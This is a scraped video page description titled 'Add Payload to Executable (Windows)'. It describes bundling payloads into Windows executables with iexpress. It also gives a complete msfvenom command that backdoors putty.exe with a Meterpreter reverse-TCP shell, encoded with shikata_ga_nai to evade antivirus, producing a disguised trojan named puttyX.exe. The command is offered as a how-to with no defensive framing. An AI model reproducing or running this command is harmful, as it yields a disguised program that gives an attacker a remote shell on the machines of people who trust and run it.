Add Payload to Executable (Windows)

Published: 01 April 2022
on channel: CodeOnBy
2,784
46

In this video we'll see how to add a payload to an executable on Windows using iexpress. This will create a win32 self extracting package.
You can use this method to combine two executables or add a Python script to run parallel to the executable itself.

To create standalone Python executables:
   • Convert Python 3 to Executable using ...  
For Python client/server sciprts:
https://codeonby.com/2019/12/23/pytho...

Alternatively, this can be done with metasploit using the following command under Linux:
msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=ip.address lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe


Watch video Add Payload to Executable (Windows) online without registration, duration hours minute second in high quality. This video was added by user CodeOnBy 01 April 2022, don't forget to share it with your friends and acquaintances, it has been viewed on our site 2,784 once and liked it 46 people.